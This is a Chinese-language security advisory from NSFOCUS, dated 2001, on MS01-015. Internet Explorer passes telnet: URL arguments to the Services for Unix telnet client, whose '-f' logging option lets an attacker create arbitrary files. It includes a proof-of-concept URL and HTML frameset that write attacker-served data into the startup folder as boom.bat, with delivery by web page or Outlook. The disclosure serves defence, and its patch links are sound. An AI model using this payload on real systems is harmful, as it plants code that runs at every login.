首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第20期->最新漏洞
期刊号: 类型: 关键词:
微软telnet程序可被用来创建任意文件

日期:2001-04-09

受影响的系统:  
    安装了Services for Unix 2.0附加包的Internet explorer的所有版本

描述:
--------------------------------------------------------------------------------


BUGTRAQ ID: 2463
  
随Services for Unix 2.0一起安装的Telnet客户程序在与IE进行交互时存在漏洞,使得攻
击者可以用指定的数据来覆盖或创建任意文件。该漏洞发生在IE执行“telnet”命令时,IE
将把URL中指定的命令行参数传递给telnet程序。

Win2000中的Telnet客户程序包含一个客户端的日志记录选项,所有的telnet会话数据将记
录在该选项指定的文件中。通过指定telnet命令中的“-f“标志及相应的文件名,所有的会
话数据都将记录到该文件中。

只有安装了Services for Unix 2.0附加包的系统才会受影响,Services for Unix 2.0在
默认情况下不随任何系统一起发行,需要单独安装。

<* 来源:Oliver Friedrichs (of@securityfocus.com)
         Microsoft Security Bulletin (MS01-015)
*>


测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!




给IE提供类似如下的URL:

telnet:-f%20\file.txt%20host

上述例子将使IE启动telnet客户程序,连接到名为host的主机,并将所有的输出记录在文件“\file.txt“中。攻击者可以利用netcat之类的工具建立假的服务器监听在telnet端口,并发送指定的数据到客户端,通过这种方法就可以把任意数据写入指定的文件中。在telnet的命令行中可以指定任意端口号,所以服务器不必监听在23端口。

而且,启动telnet客户程序的过程可以嵌入在已有的HTML页面中,这样可使其自动执行。本漏洞也可以通过Outlook来利用,因为默认情况下Outlook会处理HTML信息。

<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users\start%20menu\programs\startup\boom.bat%20host%208000>
</frameset>
</html>

上述例子将把来自名为host的主机的8000口的数据写入到用于所有用户的启动目录的boom.bat文件中。假定登录的用户具有相应的权限,这将创建一个批处理文件,以后每当用户登录时该批处理文件都会得到执行。如果攻击者知道当前登录的用户的名字,他可以写入到当前用户的相应目录中,而当前用户在该目录中肯定有创建文件的权限。

--------------------------------------------------------------------------------
建议:

厂商补丁:

微软已经为此发布了一个安全公告(MS01-015)和相应的补丁.

微软安全公告(MS01-015):
http://www.microsoft.com/technet/security/bulletin/MS01-015.asp

补丁下载:

IE 5.01 SP1 and IE 5.5 SP1(对于已经安装了Services for Unix 2.0的用户):
http://www.microsoft.com/windows/ie/download/critical/q286043/default.asp

版权所有,未经许可,不得转载